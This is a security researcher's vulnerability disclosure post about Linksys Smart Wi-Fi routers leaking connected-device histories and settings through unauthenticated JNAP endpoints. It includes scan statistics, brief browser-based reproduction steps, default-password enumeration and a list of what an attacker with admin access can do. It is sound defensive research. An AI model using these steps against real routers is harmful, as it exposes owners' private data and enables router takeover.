Our honeypots frequently detect scans targeting various home automation protocol endpoints. Many of these attacks aim to exploit vulnerable consumer routers. Upon further investigation, we’ve discovered a persistent flaw affecting Linksys Smart Wi-Fi routers that allows unauthenticated remote access to sensitive information.
How can the vulnerability be exploited?
- Go to the Linksys Smart Wi-Fi router’s public IP address in your web browser
- Open the developer console (F12 key) and go to the Network tab
- Scroll down to JNAP (there’s multiple) and click to open it
The leak can also be reproduced by sending a request to this JNAP endpoint:
This sensitive information disclosure vulnerability requires no authentication and can be exploited by a remote attacker with little technical knowledge.
How many Linksys Smart Wi-Fi routers are vulnerable?
Using data provided by BinaryEdge, our scans have found 25,617 Linksys Smart Wi-Fi routers are currently leaking sensitive information to the public internet, including:
- MAC address of every device that’s ever connected to it (full historical record, not just active devices)
- Device name (such as “TROY-PC” or “Mat’s MacBook Pro”)
- Operating system (such as “Windows 7” or “Android”)
In some cases additional metadata is logged such as device type, manufacturer, model number, and description – as seen in the example below.
Other sensitive information about the router such as the WAN settings, firewall status, firmware update settings, and DDNS settings are also leaked publicly.
What are the risks of leaking this information publicly?
A MAC address is a unique identifier for every networked device. Mobile devices, such as smartphones and laptops, share this identifier every time they connect to a wireless network. This creates a fingerprint that can be used to track that device’s movement across networks.
If a device’s name includes the full name of the owner, this flaw allows attackers to determine the identity of owner and geolocate them via the Linksys Smart Wi-Fi router’s public IP address.
While geolocation by IP address is not precise, services like WiGLE allow anyone to get the exact geographical coordinates of a WiFi network based solely on its MAC address or SSID. An attacker can query the target Linksys Smart Wi-Fi router, get it’s MAC address, and immediately geolocate it.
If a remote unauthenticated attacker was able to access the device name, model number, operating system, firmware version, and MAC address of everything connected to your home router (including the router itself) – how would you classify the issue?
— Bad Packets Report (@bad_packets) May 14, 2019
In any scenario, publicly leaking the historical record of every device that’s ever connected to the Linksys Smart Wi-Fi router is a privacy concern that shouldn’t be taken lightly. This information allows attackers to gain visibility inside your home or business network, enabling them to conduct targeted attacks.
Is there any connection to the ShadowHammer attacks?
Of the 756,565 unique MAC addresses currently being leaked, only two were referenced in the ShadowHammer attacks. However, it’s not likely either were targeted directly. The first match, 0c:5b:8f:27:9a:64, appears to be frequently reused by Huawei. The second was the VMware default (00:50:56:c0:00:08) and was targeted only if it paired with a secondary MAC address.
Did you find the German mail bomber?
The MAC address used by the German mail bomber (f8:e0:79:af:57:eb) was not found.
What is Home Network Administration Protocol (HNAP)?
HNAP is a SOAP-based protocol used to manage and configure consumer routers. Cisco acquired and took over development of the protocol in 2009. Numerous HNAP-related vulnerabilities have been identified in the last six years. Large-scale exploitation of HNAP flaws by “TheMoon” botnet was discovered by security researchers in 2014.
Are there other HNAP vulnerabilities?
Yes, an unauthenticated attacker can quickly enumerate which Linksys Smart Wi-Fi routers have not changed the default password (admin) without even attempting to login to the device. The can be done by simply querying the following JNAP endpoint:
Our scans have found thousands of routers are still using the default password and are vulnerable to immediate takeover – if they aren’t already compromised.
Admin access to the Linksys Smart Wi-Fi router allows attackers to:
- Obtain the SSID and Wi-Fi password in plaintext
- Change the DNS settings to use a rogue DNS server to hijack web traffic
- Open ports in the router’s firewall to directly target devices behind the routers (example: 3389/tcp for Windows RDP)
- Use UPnP to redirect outgoing traffic to the threat actors’ device
- Create an OpenVPN account (supported models) to route malicious traffic through the router
- Disable the router’s internet connection or modify other settings in a destructive manner
What specific models of Linksys Smart Wi-Fi routers are vulnerable?
Our research has found the models listed below are actively leaking sensitive information, including those running the latest firmware available from Linksys.
The full list of vulnerable models and firmware versions is available here.
Where are the vulnerable routers located?
This interactive map shows the total vulnerable Linksys Smart Wi-Fi routers found per country.
Overall, a grand total of 25,617 vulnerable routers were found in 146 countries and on the network of 1,998 unique autonomous systems (internet service providers).
Wasn’t this issue patched five years ago?
While CVE-2014-8244 was previously patched for this issue, our findings have indicated otherwise under three different conditions: the user has disabled their firewall, the user has configured the router to be in bridge mode, and using a UPnP IGD tool to open ports directly to the router. Upon contacting the Linksys security team (firstname.lastname@example.org) we were advised to report the vulnerability via this form. After submitting our findings, the reviewing analyst determined the issue was “Not applicable / Won’t fix” and subsequently closed.
Is there any good news?
Over half of the vulnerable Linksys Smart Wi-Fi routers (14,387) currently have automatic firmware updates enabled. If Linksys eventually patches this vulnerability, these routers will be protected automatically.
Due to the sensitive nature of this vulnerability, the IP addresses of the affected Linksys Smart Wi-Fi routers will not be published publicly.
Unfortunately, our typical recommendation of keeping your router’s firmware up-to-date is not applicable in this case as no fix is available. Linksys Smart Wi-Fi routers have remote access enabled by default, as it’s required for the Linksys App to function, and cannot be turned off as a workaround. However, most (but not all) models have the option of using third-party firmware, such as OpenWrt, that can disable remote access and prevent the leak of sensitive information.
After this article was published, Linksys (Belkin) reached out to Bad Packets requesting further details regarding the searches and data analysis from BinaryEdge. Belkin was able to determine additional scenarios that allowed these routers were configured to become vulnerable remotely. Also, Belkin has committed to enhancing the security of their routers with a future firmware updates that will prevent the UPnP IGD protocol from allowing ports to be opened directly to the router and ensuring all sensitive JNAP calls are secured.
Despite this, Belkin still has publicly denied the vulnerability exists while quietly patching their flagship Linksys WHW03 router against the issue five months later (snippet shown below). Sadly, many other Linksys router models remain vulnerable to this day.
--------------------------------------------------------------------------- Firmware version: 22.214.171.124735 Release date: Nov 21, 2019 - Addressed security concerns submitted by Bad Packets (special thanks to Troy)